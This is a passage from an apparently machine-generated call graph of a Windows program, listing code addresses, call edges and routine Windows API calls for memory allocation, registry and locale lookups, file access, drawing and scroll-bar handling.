11273 6c7c9ab0 11270->11273 11270->11277 11367 6c7c9c58 11271->11367 11272 6c7c9aa3 GetTickCount 11272->11273 11272->11277 11273->11267 11276 6c7c9ad2 GetCurrentThreadId 11276->11267 11277->11268 11277->11270 11277->11272 11277->11276 11360 6c7c9704 11277->11360 11278 6c7c9b5e GetTickCount 11279 6c7c9b44 11278->11279 11279->11271 11279->11278 11280 6c7c9bc8 11279->11280 11280->11267 11281 6c7c9bce GetCurrentThreadId 11280->11281 11281->11267 11283 6c7c98e9 11282->11283 11285 6c7c98ee 11282->11285 11311 6c7c97c0 GetModuleHandleW GetProcAddress 11283->11311 11286 6c7c991c 11285->11286 11287 6c7c9928 11285->11287 11317 6c7c6498 11286->11317 11289 6c7c6498 10 API calls 11287->11289 11290 6c7c9926 11289->11290 11290->11259 11290->11263 11292 6c7c5f9d 11291->11292 11293 6c7c6080 11291->11293 11294 6c7c5fa3 11292->11294 11299 6c7c601a Sleep 11292->11299 11293->11294 11295 6c7c5a14 11293->11295 11296 6c7c5fac 11294->11296 11302 6c7c605e Sleep 11294->11302 11305 6c7c6095 11294->11305 11297 6c7c617a 11295->11297 11298 6c7c5964 2 API calls 11295->11298 11296->11259 11297->11259 11300 6c7c5a25 11298->11300 11299->11294 11301 6c7c6034 Sleep 11299->11301 11303 6c7c5a3b VirtualFree 11300->11303 11304 6c7c5a55 11300->11304 11301->11292 11302->11305 11306 6c7c6074 Sleep 11302->11306 11307 6c7c5a4c 11303->11307 11304->11307 11308 6c7c5a5e VirtualQuery VirtualFree 11304->11308 11309 6c7c6114 VirtualFree 11305->11309 11310 6c7c60b8 11305->11310 11306->11294 11307->11259 11308->11304 11308->11307 11309->11259 11310->11259 11312 6c7c97e8 GetLogicalProcessorInformation 11311->11312 11316 6c7c9834 11311->11316 11313 6c7c97fb GetLastError 11312->11313 11312->11316 11314 6c7c9805 11313->11314 11313->11316 11315 6c7c980d GetLogicalProcessorInformation 11314->11315 11315->11316 11316->11285 11320 6c7c5c04 11317->11320 11319 6c7c64a4 11319->11290 11321 6c7c5e64 11320->11321 11324 6c7c5c1c 11320->11324 11322 6c7c5f7c 11321->11322 11323 6c7c5e28 11321->11323 11325 6c7c5f85 11322->11325 11326 6c7c59b0 VirtualAlloc 11322->11326 11330 6c7c5e42 Sleep 11323->11330 11336 6c7c5e82 11323->11336 11333 6c7c5c2e 11324->11333 11335 6c7c5cb9 Sleep 11324->11335 11325->11319 11328 6c7c59eb 11326->11328 11329 6c7c59db 11326->11329 11327 6c7c5c3d 11327->11319 11328->11319 11344 6c7c5964 11329->11344 11334 6c7c5e58 Sleep 11330->11334 11330->11336 11332 6c7c5d1c 11343 6c7c5d28 11332->11343 11349 6c7c58e8 11332->11349 11333->11327 11333->11332 11338 6c7c5cfd Sleep 11333->11338 11334->11323 11335->11333 11337 6c7c5ccf Sleep 11335->11337 11339 6c7c58e8 VirtualAlloc 11336->11339 11340 6c7c5ea0 11336->11340 11337->11324 11338->11332 11342 6c7c5d13 Sleep 11338->11342 11339->11340 11340->11319 11342->11333 11343->11319 11345 6c7c59ac 11344->11345 11346 6c7c596d 11344->11346 11345->11328 11346->11345 11347 6c7c5978 Sleep 11346->11347 11347->11345 11348 6c7c5992 Sleep 11347->11348 11348->11346 11353 6c7c587c 11349->11353 11351 6c7c58f1 VirtualAlloc 11352 6c7c5908 11351->11352 11352->11343 11354 6c7c581c 11353->11354 11354->11351 11356 6c7c9f28 11355->11356 11357 6c7c9f21 11355->11357 11358 6c7c9f4f 11356->11358 11359 6c7c9f3c GetCurrentThreadId 11356->11359 11357->11268 11358->11268 11359->11358 11361 6c7c970f 11360->11361 11362 6c7c975d 11361->11362 11363 6c7c973e 11361->11363 11364 6c7c9735 Sleep 11361->11364 11362->11277 11365 6c7c974d Sleep 11363->11365 11366 6c7c9756 SwitchToThread 11363->11366 11364->11362 11365->11362 11366->11362 11368 6c7c9cb1 11367->11368 11369 6c7c9c6a 11367->11369 11368->11279 11369->11368 11370 6c7c9c98 Sleep 11369->11370 11370->11369 11376 6c7d17ac 11371->11376 11373 6c87a36a 11381 6c7eff74 11373->11381 11377 6c7d17b4 11376->11377 11377->11377 11380 6c7d17d9 11377->11380 11385 6c7cead0 11377->11385 11379 6c7d1805 LoadStringW 11379->11380 11380->11373 11382 6c7eff80 11381->11382 11445 6c7e9cd0 11382->11445 11384 6c7effad 11386 6c7ceafd 11385->11386 11387 6c7ceade 11385->11387 11386->11379 11387->11386 11390 6c7cea88 11387->11390 11391 6c7cea98 GetModuleFileNameW 11390->11391 11392 6c7ceab4 11390->11392 11394 6c7cfd48 GetModuleFileNameW 11391->11394 11392->11379 11395 6c7cfd96 11394->11395 11400 6c7cfc20 11395->11400 11404 6c7cfc41 11400->11404 11401 6c7cfcc9 11403 6c7cfcb6 11405 6c7cfcbc 11403->11405 11406 6c7cfccb GetUserDefaultUILanguage 11403->11406 11404->11401 11418 6c7cf934 11404->11418 11407 6c7cfa68 FindFirstFileW FindClose 11405->11407 11408 6c7cf2cc 17 API calls 11406->11408 11407->11401 11409 6c7cfcd8 11408->11409 11410 6c7cfa68 FindFirstFileW FindClose 11409->11410 11411 6c7cfce5 11410->11411 11412 6c7cfd0d 11411->11412 11413 6c7cfcf3 GetSystemDefaultUILanguage 11411->11413 11412->11401 11414 6c7cfb50 FindFirstFileW FindClose GetUserDefaultUILanguage GetLocaleInfoW 11412->11414 11415 6c7cf2cc 17 API calls 11413->11415 11414->11401 11416 6c7cfd00 11415->11416 11417 6c7cfa68 FindFirstFileW FindClose 11416->11417 11417->11412 11419 6c7cf956 11418->11419 11422 6c7cf968 11418->11422 11424 6c7cf614 11419->11424 11425 6c7cf631 11424->11425 11426 6c7cf65a 11425->11426 11427 6c7cf645 GetModuleFileNameW 11425->11427 11428 6c7cf682 RegOpenKeyExW 11426->11428 11431 6c7cf81f 11426->11431 11427->11426 11429 6c7cf6a9 RegOpenKeyExW 11428->11429 11430 6c7cf743 11428->11430 11429->11430 11432 6c7cf6c7 RegOpenKeyExW 11429->11432 11433 6c7cf414 7 API calls 11430->11433 11432->11430 11434 6c7cf6e5 RegOpenKeyExW 11432->11434 11435 6c7cf75f RegQueryValueExW 11433->11435 11434->11430 11436 6c7cf703 RegOpenKeyExW 11434->11436 11437 6c7cf779 11435->11437 11438 6c7cf7a6 RegQueryValueExW 11435->11438 11436->11430 11439 6c7cf721 RegOpenKeyExW 11436->11439 11443 6c7cf781 RegQueryValueExW 11437->11443 11440 6c7cf7a4 11438->11440 11441 6c7cf7c2 11438->11441 11439->11430 11439->11431 11442 6c7cf80c RegCloseKey 11440->11442 11444 6c7cf7ca RegQueryValueExW 11441->11444 11442->11431 11443->11440 11444->11440 11448 6c7e9cf8 11445->11448 11451 6c7e9d28 11448->11451 11450 6c7e9cf0 11450->11384 11452 6c7e9d31 11451->11452 11455 6c7e9d91 11452->11455 11457 6c7e9be0 11452->11457 11454 6c7e9df8 11454->11450 11455->11454 11456 6c7e9be0 75 API calls 11455->11456 11456->11455 11460 6c7ea080 11457->11460 11461 6c7ea0da 11460->11461 11463 6c7ea0d3 11460->11463 11462 6c7e9b64 75 API calls 11462->11463 11463->11461 11463->11462 11464->11242 11466 6c8f8e0c 11465->11466 11468 6c8f8e17 11465->11468 11466->11468 11476 6c8f8d9c 11466->11476 11469 6c87b070 11468->11469 11470 6c87ae78 36 API calls 11469->11470 11471 6c87b085 11470->11471 11480 6c87a66c 11471->11480 11474 6c7c9c34 25 API calls 11475 6c87b0ba 11474->11475 11477 6c8f8da7 11476->11477 11478 6c8f8df1 11476->11478 11477->11478 11479 6c8f8dbb SelectObject SelectObject SelectObject 11477->11479 11478->11468 11479->11478 11481 6c87a677 11480->11481 11482 6c87a686 11481->11482 11484 6c87a28c 11481->11484 11482->11474 11485 6c87a297 11484->11485 11486 6c87a32c 75 API calls 11485->11486 11487 6c87a2ab 11485->11487 11486->11487 11487->11482 11493 6c7c98c8 GetCurrentThreadId 11488->11493 11490 6c7c9bf7 11491 6c7c9c58 Sleep 11490->11491 11492 6c7c9c23 11490->11492 11491->11492 11494 6c7c98d5 11493->11494 11494->11490 12800 6c8fddd7 12801 6c8fdde0 12800->12801 12807 6c8fdd88 12800->12807 12802 6c7c9c34 25 API calls 12801->12802 12805 6c8fddfa 12802->12805 12803 6c87a41c 75 API calls 12803->12807 12804 6c8f7da0 5 API calls 12804->12807 12805->12805 12807->12800 12807->12803 12807->12804 12809 6c8fdef4 12807->12809 12823 6c8f7e00 LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 12807->12823 12810 6c8fdf09 12809->12810 12822 6c8fdf89 12809->12822 12824 6c8f7cf8 EnterCriticalSection LeaveCriticalSection EnterCriticalSection 12810->12824 12812 6c8fdf11 12813 6c8fdf29 SelectObject 12812->12813 12814 6c8fdf36 12812->12814 12813->12814 12815 6c8fdf4f 12814->12815 12816 6c8fdf40 SelectPalette 12814->12816 12817 6c8f8dfc 3 API calls 12815->12817 12816->12815 12818 6c8fdf5f DeleteDC 12817->12818 12819 6c87b070 94 API calls 12818->12819 12820 6c8fdf74 12819->12820 12825 6c8f7e00 LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 12820->12825 12822->12807 12823->12807 12824->12812 12825->12822 12517 6c7fd564 12520 6c7fd550 12517->12520 12519 6c7fd56a 12521 6c7fd55d 12520->12521 12522 6c7fd557 12520->12522 12525 6c7fd4b8 12521->12525 12522->12519 12524 6c7fd562 12524->12519 12526 6c7fd4c6 VariantClear 12525->12526 12528 6c7fd4d3 12525->12528 12527 6c7fd4d1 12526->12527 12527->12524 12528->12527 12529 6c7fd53e VariantClear VariantInit 12528->12529 12529->12527 13087 6c9d5440 13088 6c7cc6e4 16 API calls 13087->13088 13089 6c9d545b 13088->13089 12826 6c9d58c3 12828 6c9d58d0 12826->12828 12843 6c9d5990 12826->12843 12829 6c9d5927 12828->12829 12830 6c8b2c8c 64 API calls 12828->12830 12831 6c7cce8c 49 API calls 12829->12831 12830->12829 12832 6c9d594a 12831->12832 12834 6c7cce8c 49 API calls 12832->12834 12835 6c9d5961 12834->12835 12841 6c7cc6e4 16 API calls 12835->12841 12841->12843 12846 6c881884 12843->12846 12847 6c88188d 12846->12847 12850 6c8818c8 12847->12850 12851 6c8818e3 12850->12851 12852 6c88198e 12851->12852 12853 6c881910 12851->12853 12877 6c7e8814 12852->12877 12873 6c7e886c 12853->12873 12856 6c881998 12857 6c7e9678 2 API calls 12856->12857 12861 6c88198c 12856->12861 12859 6c8819b3 GetLastError 12857->12859 12858 6c88192d 12860 6c7e9678 2 API calls 12858->12860 12858->12861 12862 6c7ee5b8 2 API calls 12859->12862 12863 6c88194c GetLastError 12860->12863 12864 6c8819cc 12862->12864 12865 6c7ee5b8 2 API calls 12863->12865 12866 6c7f0148 75 API calls 12864->12866 12867 6c881965 12865->12867 12868 6c8819ee 12866->12868 12869 6c7f0148 75 API calls 12867->12869 12870 6c7ca504 11 API calls 12868->12870 12871 6c881987 12869->12871 12870->12861 12872 6c7ca504 11 API calls 12871->12872 12872->12861 12874 6c7e88ba 12873->12874 12875 6c7e8882 12873->12875 12874->12858 12876 6c7e88b4 CreateFileW 12875->12876 12876->12874 12878 6c7e8868 12877->12878 12879 6c7e882a 12877->12879 12878->12856 12879->12878 12880 6c7e8862 CreateFileW 12879->12880 12880->12878 12530 6c9d5abd 12531 6c9d5add 12530->12531 12532 6c9d5ac6 12530->12532 12542 6c7f9368 12531->12542 12533 6c7f0074 64 API calls 12532->12533 12535 6c9d5ad8 12533->12535 12537 6c7ca504 11 API calls 12535->12537 12536 6c9d5ae2 12546 6c7f91a0 12536->12546 12537->12531 12539 6c9d5b09 12541 6c9d5b14 12539->12541 12570 6c8df9d0 12539->12570 12543 6c7f937d 12542->12543 12544 6c7f9371 12542->12544 12543->12536 12573 6c7f97f0 12544->12573 12548 6c7f91bd 12546->12548 12547 6c7f91e1 12549 6c7f9209 12547->12549 12552 6c7f0148 75 API calls 12547->12552 12548->12547 12551 6c7f0074 64 API calls 12548->12551 12550 6c7f9231 12549->12550 12553 6c7f0148 75 API calls 12549->12553 12557 6c7f9266 12550->12557 12561 6c7f0148 75 API calls 12550->12561 12554 6c7f91dc 12551->12554 12555 6c7f9204 12552->12555 12556 6c7f922c 12553->12556 12558 6c7ca504 11 API calls 12554->12558 12559 6c7ca504 11 API calls 12555->12559 12560 6c7ca504 11 API calls 12556->12560 12577 6c7f8a28 12557->12577 12558->12547 12559->12549 12560->12550 12563 6c7f9261 12561->12563 12565 6c7ca504 11 API calls 12563->12565 12565->12557 12566 6c7f0074 64 API calls 12567 6c7f9290 12566->12567 12569 6c7ca504 11 API calls 12567->12569 12568 6c7f9295 12568->12539 12569->12568 12595 6c7e88c0 12570->12595 12574 6c7f97f6 12573->12574 12575 6c7f9464 77 API calls 12574->12575 12576 6c7f9814 12575->12576 12576->12543 12578 6c7f8a39 12577->12578 12579 6c7f8a54 12577->12579 12578->12579 12581 6c7f0074 64 API calls 12578->12581 12580 6c7f8a81 12579->12580 12582 6c7f0148 75 API calls 12579->12582 12583 6c7f8aa9 12580->12583 12586 6c7f0148 75 API calls 12580->12586 12584 6c7f8a4f 12581->12584 12585 6c7f8a7c 12582->12585 12587 6c7f8adf 12583->12587 12591 6c7f0148 75 API calls 12583->12591 12588 6c7ca504 11 API calls 12584->12588 12589 6c7ca504 11 API calls 12585->12589 12590 6c7f8aa4 12586->12590 12587->12566 12587->12568 12588->12579 12589->12580 12592 6c7ca504 11 API calls 12590->12592 12593 6c7f8ada 12591->12593 12592->12583 12594 6c7ca504 11 API calls 12593->12594 12594->12587 12596 6c7e88e6 12595->12596 12603 6c7e8959 12595->12603 12596->12603 12604 6c7e8a14 12596->12604 12605 6c7ce254 60 API calls 12604->12605 12606 6c7e8a4b 12605->12606 12607 6c7ce254 60 API calls 12606->12607 12608 6c7e8a66 12607->12608 12627 6c7e8cf8 12608->12627 12612 6c7e8b14 12649 6c7f06bc 12612->12649 12613 6c7e8a82 12613->12612 12616 6c7e8ac5 GetVolumeInformationW 12613->12616 12618 6c7e8b0f 12616->12618 12623 6c7e8ad1 GetDriveTypeW 12616->12623 12620 6c7f304c 78 API calls 12618->12620 12619 6c7e8af7 12621 6c7ce378 16 API calls 12619->12621 12620->12612 12624 6c7e8b4f 12621->12624 12623->12619 12625 6c7ce378 16 API calls 12624->12625 12626 6c7e8b5d 12625->12626 12628 6c7cbab4 12627->12628 12629 6c7e8d0b GetFileAttributesW 12628->12629 12630 6c7e8d1a 12629->12630 12631 6c7e8a75 12629->12631 12630->12631 12632 6c7e8d33 CreateFileW 12630->12632 12633 6c7e8d61 12630->12633 12631->12613 12638 6c7e8c60 12631->12638 12632->12631 12634 6c7e8d50 CloseHandle 12632->12634 12633->12631 12635 6c7e8d6d CreateFileW 12633->12635 12634->12631 12636 6c7e8d8a CloseHandle 12635->12636 12637 6c7e8d94 12635->12637 12636->12631 12637->12631 12639 6c7cbab4 12638->12639 12640 6c7e8c6e GetFileAttributesW 12639->12640 12641 6c7e8cca GetLastError 12640->12641 12642 6c7e8c7b 12640->12642 12644 6c7e8cd6 12641->12644 12648 6c7e8c84 12641->12648 12643 6c7e8c90 CreateFileW 12642->12643 12642->12648 12645 6c7e8caa CloseHandle 12643->12645 12646 6c7e8cb4 GetLastError 12643->12646 12644->12648 12653 6c7e8c20 12644->12653 12645->12648 12646->12648 12648->12613 12650 6c7f06c8 12649->12650 12651 6c7d17ac 64 API calls 12650->12651 12652 6c7f06f2 12651->12652 12654 6c7cbab4 12653->12654 12655 6c7e8c3a FindFirstFileW 12654->12655 12656 6c7e8c57 12655->12656 12657 6c7e8c45 FindClose 12655->12657 12656->12648 12657->12656 11191 6c9273f0 11192 6c92740a KiUserCallbackDispatcher 11191->11192 13090 6c9d4f7f 13159 6c9d2b6c 13090->13159 13095 6c9d2b2c 64 API calls 13096 6c9d4fba 13095->13096 13097 6c9d2b2c 64 API calls 13096->13097 13098 6c9d4fce 13097->13098 13099 6c9d2b2c 64 API calls 13098->13099 13100 6c9d4fe2 13099->13100 13101 6c9d2b6c 64 API calls 13100->13101 13102 6c9d4ff5 13101->13102 13103 6c9d2b6c 64 API calls 13102->13103 13104 6c9d5008 13103->13104 13105 6c9d2b6c 64 API calls 13104->13105 13106 6c9d501b 13105->13106 13107 6c9d2b6c 64 API calls 13106->13107 13108 6c9d502e 13107->13108 13109 6c9d2b2c 64 API calls 13108->13109 13110 6c9d5044 13109->13110 13111 6c9d2b2c 64 API calls 13110->13111 13112 6c9d505a 13111->13112 13113 6c9d2b2c 64 API calls 13112->13113 13114 6c9d5070 13113->13114 13115 6c9d2b2c 64 API calls 13114->13115 13116 6c9d5084 13115->13116 13117 6c9d2b2c 64 API calls 13116->13117 13118 6c9d5098 13117->13118 13119 6c9d2b6c 64 API calls 13118->13119 13120 6c9d50ab 13119->13120 13121 6c9d2b6c 64 API calls 13120->13121 13122 6c9d50be 13121->13122 13123 6c9d50d4 13122->13123 13167 6c9d2ab4 13122->13167 13125 6c9d50ea 13123->13125 13126 6c9d2ab4 80 API calls 13123->13126 13127 6c9d2ab4 80 API calls 13125->13127 13129 6c9d4efd 13125->13129 13126->13125 13127->13129 13128 6c9d4f2c 13131 6c7cce8c 49 API calls 13128->13131 13129->13128 13130 6c8b2c8c 64 API calls 13129->13130 13136 6c9d4f75 13129->13136 13130->13128 13132 6c9d4f49 13131->13132 13133 6c7cce8c 49 API calls 13132->13133 13134 6c9d4f5a 13133->13134 13135 6c7cc6e4 16 API calls 13134->13135 13135->13136 13137 6c9d52cf 13136->13137 13138 6c7ce254 60 API calls 13136->13138 13139 6c9d2b6c 64 API calls 13137->13139 13138->13137 13140 6c9d5303 13139->13140 13141 6c9d2b2c 64 API calls 13140->13141 13142 6c9d531a 13141->13142 13143 6c9d2b2c 64 API calls 13142->13143 13144 6c9d5331 13143->13144 13145 6c9d2b2c 64 API calls 13144->13145 13146 6c9d5348 13145->13146 13147 6c9d2b2c 64 API calls 13146->13147 13148 6c9d535f 13147->13148 13149 6c9d2b6c 64 API calls 13148->13149 13150 6c9d5375 13149->13150 13151 6c9d2b6c 64 API calls 13150->13151 13152 6c9d538b 13151->13152 13153 6c9d2b2c 64 API calls 13152->13153 13154 6c9d53a2 13153->13154 13155 6c9d2ab4 80 API calls 13154->13155 13156 6c9d53c2 13154->13156 13155->13156 13173 6c8b48dc 13156->13173 13158 6c9d53fa 13160 6c9d2b85 13159->13160 13161 6c9d2b9e 13160->13161 13162 6c7f0074 64 API calls 13160->13162 13163 6c9d2b2c 13161->13163 13162->13161 13164 6c9d2b46 13163->13164 13165 6c9d2b5f 13164->13165 13166 6c7f0074 64 API calls 13164->13166 13165->13095 13166->13165 13168 6c9d2ac9 13167->13168 13169 6c9d2afd 13168->13169 13170 6c7f0074 64 API calls 13168->13170 13171 6c7ce378 16 API calls 13169->13171 13170->13169 13172 6c9d2b1d 13171->13172 13178 6c8b67a0 13173->13178 13176 6c8b66c0 60 API calls 13177 6c8b48f1 13176->13177 13177->13158 13179 6c8b67aa 13178->13179 13180 6c8b67af 13178->13180 13181 6c8b2c8c 64 API calls 13179->13181 13182 6c8b67c7 13180->13182 13183 6c8b66c0 60 API calls 13180->13183 13181->13180 13184 6c8b48e8 13182->13184 13186 6c8b4e34 13182->13186 13183->13182 13184->13176 13187 6c8b4e4c 13186->13187 13188 6c8b2c8c 64 API calls 13187->13188 13189 6c8b4e6d 13187->13189 13188->13189 13189->13184 11519 6c7cead0 11520 6c7ceafd 11519->11520 11521 6c7ceade 11519->11521 11521->11520 11522 6c7cea88 63 API calls 11521->11522 11523 6c7ceaf4 11522->11523 12881 6c9832f6 12883 6c983305 12881->12883 12882 6c983382 12883->12882 12884 6c7e75c0 CompareStringW 12883->12884 12885 6c98333a 12883->12885 12884->12883 12885->12882 12886 6c8b4788 60 API calls 12885->12886 12886->12882 13190 6c9d5c72 13196 6c9d5c7b 13190->13196 13191 6c9d5d84 13192 6c9d5dbc 13191->13192 13193 6c8b2c8c 64 API calls 13191->13193 13194 6c7cce8c 49 API calls 13192->13194 13193->13192 13195 6c9d5ddf 13194->13195 13197 6c7cc6e4 16 API calls 13195->13197 13196->13191 13198 6c7ce254 60 API calls 13196->13198 13199 6c9d5e10 13197->13199 13201 6c9d5cdb 13198->13201 13200 6c7f0074 64 API calls 13200->13201 13201->13191 13201->13200 13202 6c7ca504 11 API calls 13201->13202 13202->13201 12887 6c805ff0 12888 6c80600d 12887->12888 12889 6c805ff6 12887->12889 12891 6c7fde24 12889->12891 12892 6c7fde32 12891->12892 12895 6c7fde4a 12891->12895 12893 6c7fde3c 12892->12893 12894 6c7fde5b 12892->12894 12893->12895 12897 6c7fd4b8 3 API calls 12893->12897 12898 6c7fdd08 12894->12898 12895->12888 12897->12895 12899 6c7fdd1a 12898->12899 12900 6c7fdd21 12898->12900 12901 6c7fd4b8 3 API calls 12899->12901 12902 6c7fdd35 VariantCopy 12900->12902 12903 6c7fdd4a 12900->12903 12901->12900 12905 6c7fdd45 12902->12905 12904 6c7fde0d VariantCopy 12903->12904 12903->12905 12904->12905 12905->12895 12997 6c8f9a3d 13003 6c8f92f0 12997->13003 13000 6c8f915c 77 API calls 13001 6c8f9ab3 13000->13001 13002 6c8f9ad1 DeleteObject 13001->13002 13004 6c8f92fd CreateDIBitmap 13003->13004 13004->13000 12662 6c9d5ea9 12663 6c9d5eb6 12662->12663 12680 6c9d5fd5 12662->12680 12664 6c7e8c60 7 API calls 12663->12664 12666 6c9d5ec0 12664->12666 12665 6c7cc6e4 16 API calls 12669 6c9d602b 12665->12669 12666->12680 12684 6c9d294c 12666->12684 12669->12669 12670 6c9d5f47 12671 6c9d5f7f 12670->12671 12673 6c8b2c8c 64 API calls 12670->12673 12674 6c7cce8c 49 API calls 12671->12674 12673->12671 12676 6c9d5fa2 12674->12676 12678 6c7cc6e4 16 API calls 12676->12678 12678->12680 12680->12665 12685 6c9d2982 12684->12685 12686 6c9d29ae 12685->12686 12723 6c7eba98 12685->12723 12686->12670 12688 6c8dfb74 12686->12688 12739 6c8dfc9c 12688->12739 12724 6c7ebaac 12723->12724 12726 6c7ebaf8 12723->12726 12724->12726 12727 6c7eba18 12724->12727 12726->12686 12730 6c7eb990 12727->12730 12731 6c7eb99a 12730->12731 12733 6c7eb9d1 12731->12733 12734 6c7e70ac 12731->12734 12733->12726 12735 6c7f0148 75 API calls 12734->12735 12736 6c7e70c5 12735->12736 12737 6c7ca504 11 API calls 12736->12737 12738 6c7e70ca 12737->12738 12738->12733 12740 6c8dfca9 12739->12740 12741 6c8dfb9d 12740->12741 12742 6c8e0788 CompareStringW 12740->12742 12747 6c8e0610 12741->12747 12743 6c8dfcb9 12742->12743 12743->12741 12744 6c7f06bc 64 API calls 12743->12744 12745 6c8dfcf1 12744->12745 12746 6c7ca504 11 API calls 12745->12746 12746->12741 12748 6c8e0637 12747->12748 12749 6c8e0460 CompareStringW 12748->12749 12750 6c8e0650 12748->12750 12751 6c8e0647 12749->12751 12753 6c8e070c 12751->12753 12754 6c8e0719 12753->12754 12755 6c8e0460 CompareStringW 12754->12755 12756 6c8e072c 12754->12756 12755->12756 12756->12750 11495 6c7c5c04 11496 6c7c5e64 11495->11496 11499 6c7c5c1c 11495->11499 11497 6c7c5f7c 11496->11497 11498 6c7c5e28 11496->11498 11500 6c7c5f85 11497->11500 11501 6c7c59b0 VirtualAlloc 11497->11501 11505 6c7c5e42 Sleep 11498->11505 11511 6c7c5e82 11498->11511 11508 6c7c5c2e 11499->11508 11510 6c7c5cb9 Sleep 11499->11510 11503 6c7c59eb 11501->11503 11504 6c7c59db 11501->11504 11502 6c7c5c3d 11506 6c7c5964 2 API calls 11504->11506 11509 6c7c5e58 Sleep 11505->11509 11505->11511 11506->11503 11507 6c7c5d1c 11516 6c7c58e8 VirtualAlloc 11507->11516 11518 6c7c5d28 11507->11518 11508->11502 11508->11507 11513 6c7c5cfd Sleep 11508->11513 11509->11498 11510->11508 11512 6c7c5ccf Sleep 11510->11512 11514 6c7c58e8 VirtualAlloc 11511->11514 11515 6c7c5ea0 11511->11515 11512->11499 11513->11507 11517 6c7c5d13 Sleep 11513->11517 11514->11515 11516->11518 11517->11508 13005 6c8f6634 13006 6c8f663a 13005->13006 13008 6c8f664a 13005->13008 13007 6c8f6644 DeleteObject 13006->13007 13006->13008 13007->13008 11524 6c9b1aa4 11525 6c9b1aad 11524->11525 11528 6c9b20dc 11525->11528 11529 6c9b20f3 11528->11529 11551 6c9b1aba 11528->11551 11529->11551 11553 6c9b1548 11529->11553 11532 6c9b212d 11535 6c9b1bf4 91 API calls 11532->11535 11533 6c9b2153 11534 6c9b1548 4 API calls 11533->11534 11537 6c9b2161 11534->11537 11536 6c9b213f 11535->11536 11538 6c9b1bf4 91 API calls 11536->11538 11539 6c9b218b 11537->11539 11540 6c9b2165 11537->11540 11549 6c9b2151 11538->11549 11556 6c9b1bf4 11539->11556 11541 6c9b1bf4 91 API calls 11540->11541 11543 6c9b2177 11541->11543 11546 6c9b1bf4 91 API calls 11543->11546 11546->11549 11547 6c9b1bf4 91 API calls 11547->11549 11569 6c97c878 11549->11569 11587 6c9b14b8 11553->11587 11555 6c9b1556 11555->11532 11555->11533 11557 6c9b1c1a 11556->11557 11558 6c9b1c35 11557->11558 11559 6c9b14b8 4 API calls 11557->11559 11560 6c9b14b8 4 API calls 11558->11560 11559->11558 11561 6c9b1c85 11560->11561 11610 6c9b1aec 11561->11610 11563 6c9b1ca1 11564 6c9b1cb6 FlatSB_SetScrollInfo 11563->11564 11623 6c9b1978 11564->11623 11567 6c9b14b8 4 API calls 11568 6c9b1cd3 11567->11568 11568->11547 11570 6c97c894 11569->11570 11571 6c97c8a3 11569->11571 11570->11571 11572 6c97c89a 11570->11572 11670 6c9833f0 11571->11670 11666 6c98340c 11572->11666 11575 6c97c89f 11577 6c97c90f 11575->11577 11652 6c983430 11575->11652 11578 6c97c8be 11578->11577 11579 6c97c917 11578->11579 11580 6c97c8d5 11578->11580 11579->11577 11660 6c982c40 11579->11660 11674 6c98320c 11580->11674 11595 6c931294 11587->11595 11589 6c9b14d3 GetWindowLongW 11590 6c9b1512 11589->11590 11591 6c9b14f2 11589->11591 11593 6c9b1444 3 API calls 11590->11593 11597 6c9b1444 11591->11597 11594 6c9b14fe 11593->11594 11594->11555 11596 6c93129e 11595->11596 11596->11589 11598 6c9b1459 11597->11598 11599 6c9b14b1 11597->11599 11600 6c9b1487 11598->11600 11607 6c9b1410 11598->11607 11599->11594 11600->11599 11602 6c9b1410 GetWindowLongW 11600->11602 11604 6c9b149b 11602->11604 11603 6c9b146d 11603->11600 11605 6c9b1472 GetSystemMetrics 11603->11605 11604->11599 11606 6c9b14a0 GetSystemMetrics 11604->11606 11605->11599 11606->11599 11608 6c9b141f 11607->11608 11609 6c9b1432 GetWindowLongW 11608->11609 11609->11603 11611 6c931294 11610->11611 11612 6c9b1b29 FlatSB_SetScrollProp 11611->11612 11613 6c9b1b60 11612->11613 11614 6c9b1b37 11612->11614 11615 6c9b1b91 11613->11615 11619 6c9b1b8b FlatSB_SetScrollProp 11613->11619 11616 6c9b1b5a FlatSB_SetScrollProp 11614->11616 11617 6c9b1bc2 11615->11617 11620 6c9b1bbc FlatSB_SetScrollProp 11615->11620 11616->11613 11634 6c8f68e0 11617->11634 11619->11615 11620->11617 11621 6c9b1bce 11622 6c9b1bea FlatSB_SetScrollProp 11621->11622 11622->11563 11624 6c9b1986 11623->11624 11625 6c9b198e 11623->11625 11624->11567 11626 6c9b19ce 11625->11626 11627 6c9b19bd 11625->11627 11633 6c9b19cc 11625->11633 11630 6c930de0 78 API calls 11626->11630 11637 6c930de0 11627->11637 11628 6c9b1a10 FlatSB_GetScrollPos 11628->11624 11631 6c9b1a1b 11628->11631 11630->11633 11632 6c9b1a2a FlatSB_SetScrollPos 11631->11632 11632->11624 11633->11628 11635 6c8f68ef 11634->11635 11636 6c8f68e4 GetSysColor 11634->11636 11635->11621 11636->11635 11638 6c930e04 11637->11638 11639 6c930dfa IsWindowVisible 11637->11639 11640 6c930e15 ScrollWindow 11638->11640 11643 6c930e2f 11638->11643 11639->11638 11640->11643 11641 6c930ea9 11641->11633 11643->11641 11644 6c930e7b SetWindowPos 11643->11644 11645 6c92c468 11643->11645 11644->11643 11646 6c92c47a 11645->11646 11647 6c92c490 11646->11647 11648 6c92c485 11646->11648 11649 6c87a41c 75 API calls 11647->11649 11650 6c87a41c 75 API calls 11648->11650 11651 6c92c48e 11649->11651 11650->11651 11651->11643 11653 6c983440 11652->11653 11654 6c983434 11652->11654 11686 6c983464 11653->11686 11654->11653 11655 6c98343a 11654->11655 11682 6c983488 11655->11682 11661 6c982c49 11660->11661 11662 6c982c6a 11660->11662 11689 6c97d7bc 11661->11689 11662->11577 11664 6c982c55 11695 6c983d34 11664->11695 11667 6c983415 11666->11667 11668 6c983423 11667->11668 11669 6c982c40 112 API calls 11667->11669 11668->11575 11669->11668 11671 6c9833f9 11670->11671 11672 6c9833fe 11670->11672 11673 6c982c40 112 API calls 11671->11673 11672->11575 11673->11672 11675 6c98322b 11674->11675 11677 6c98325a 11675->11677 11935 6c982750 11675->11935 11679 6c9832b1 11677->11679 11949 6c7e75c0 11677->11949 11954 6c7cc6e4 11679->11954 11683 6c98343f 11682->11683 11684 6c983491 11682->11684 11683->11578 11685 6c98340c 112 API calls 11684->11685 11685->11683 11687 6c9833f0 112 API calls 11686->11687 11688 6c983445 11687->11688 11688->11578 11690 6c97d7c6 11689->11690 11704 6c9097ec 11690->11704 11694 6c97d844 11694->11664 11696 6c983d6c 11695->11696 11697 6c983d6f 11696->11697 11698 6c983d84 11696->11698 11815 